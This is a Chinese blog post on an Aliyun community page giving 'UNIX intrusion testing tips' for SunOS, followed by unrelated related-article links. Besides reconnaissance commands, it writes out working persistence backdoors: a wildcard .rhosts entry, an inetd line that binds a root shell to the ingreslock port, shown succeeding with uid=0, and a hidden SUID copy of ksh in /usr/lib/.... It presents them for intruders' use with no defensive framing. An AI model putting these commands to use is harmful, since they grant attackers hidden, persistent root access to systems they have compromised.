AI 助理
文档备案控制台
开发者社区 开发与运维 文章 正文

UNIX入侵测试TIPS[20101027更新]

2017-11-08 999
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

 这里只提示具体指令及相关功能,具体在实战中的利用由各位自己去摸索,有任何问题可以留言这里我的讲解侧重SUNOS,其他UNIX系统大同小异

1,uname -a 这个不用多说了 查看内核版本,找对应EXP吧

2,cat /etc/release 同上~不过对SUNOS来说可以查看SunOS 和对应的Solaris版本

3,ls -al 看看用户目录下有没有.rhosts文件,看看有没有以前的入侵者

4,ps –ef 查看进程

5,netstat -an|grep LISTEN 查看有没有可以端口

6,cat /etc/hosts 查看本机的内部网络 为内网渗透做准备

7,echo “+ +” >/.rhosts 


echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x  

/usr/sbin/inetd -s /tmp/.x  

rm -f /tmp/.x  

telnet localhost 1524  

Trying 127.0.0.1...  

Connected to localhost. Escape character is '^]'.  

# id 

ksh: id^M: not found  

# id;  

uid=0(root) gid=0(root)  

ksh: ^M: not found  

# exit;  

Connection closed by foreign host. 

Exit  

简单的Telnet后门

8,有时用Gcc编译EXP时出错可以挂上nsl和socket库再试试

gcc -o exp exp.c -lsocket -lnsl

9,suid root shell:

mkdir /usr/lib/...    

cp /bin/ksh /usr/lib/.../.x 

chmod +s /usr/lib/.../.x 

exit

以任意用户登录:$ /usr/lib/.../.x

本文持续更新...... 
















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/411592,如需转载请自行联系原作者

文章标签:
Unix
Shell
C语言
关键词:
测试tips
测试更新
技术小美
目录
相关文章
游客g2r3yknu46ngq
|
XML JSON 前端开发
使用Mock技术帮助提升测试效率的小tips,你知道几个?
使用Mock技术帮助提升测试效率的小tips,你知道几个?
游客g2r3yknu46ngq
226 0
richard1230
|
测试技术
赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips
正文 本文承接前文赏金猎人系列-如何测试注册(Sign up)功能,继续梳理注册功能的测试流程,相关文章还有: 注册功能测试小结
richard1230
344 1
richard1230
|
安全 测试技术
漏洞赏金猎人系列-如何测试注册(Sign up)功能(V)以及相关Tips
本文为本系列的最后一篇,梳理了SignUp最后几种测试方法(tips); 前面相关的文章有: 注册功能测试小结 赏金猎人系列-如何测试注册(Sign up)功能 赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips 漏洞赏金猎人系列-如何测试注册(Sign up)功能(IV)以及相关Tips
richard1230
279 1
cejze5tbulhvo
|
测试技术
开发询问测试是否能提前更新测试环境,测试应该如何分析和决策?
开发询问测试是否能提前更新测试环境,测试应该如何分析和决策?
cejze5tbulhvo
318 0
软件测试帅哥
|
测试技术
软件测试之 【移动端测试】软件更新:强制更新和非强制更新
软件测试之 【移动端测试】软件更新:强制更新和非强制更新
软件测试帅哥
603 0
店家小二
|
存储 Kubernetes 应用服务中间件
Kubernetes ConfigMap热更新测试 – 探究ConfigMap的创建和更新流程
ConfigMap热更新测试 ConfigMap是用来存储配置文件的kubernetes资源对象,所有的配置内容都存储在etcd中,下文主要是探究 ConfigMap 的创建和更新流程,以及对 ConfigMap 更新后容器内挂载的内容是否同步更新的测试。
店家小二
2900 0
技术小甜
|
.NET 测试技术
《asp.net夜话》一书测试视频免费发布(2009年4月13日更新)
技术小甜
1234 0
晚来风急
|
存储 Windows
微软发誓在内部对Windows 10更新进行全面测试
晚来风急
980 0
听风de歌
|
Unix Shell Linux
在Unix/Linux操作系统中,Shell脚本广泛用于自动化任务
在Unix/Linux操作系统中,Shell脚本广泛用于自动化任务
听风de歌
246 2
云域A
|
12月前
|
安全 Unix Linux
Unix:Linux的“祖师爷”
Unix的诞生 Unix操作系统诞生于1969年,由肯·汤普逊(Kenneth Lane Thompson)和丹尼斯·里奇(Dennis MacAlistair Ritchie)在AT&T的贝尔实验室开发。其初衷是为了在闲置的PDP-7计算机上开发一个简单的操作系统,以便进行编程和游戏。最初的Unix是用汇编语言编写的,但随后为了更高效的开发和更好的可移植性,里奇和汤普逊用C语言重写了Unix的大部分代码,这奠定了Unix的基础,并促进了C语言的广泛应用。
云域A
333 2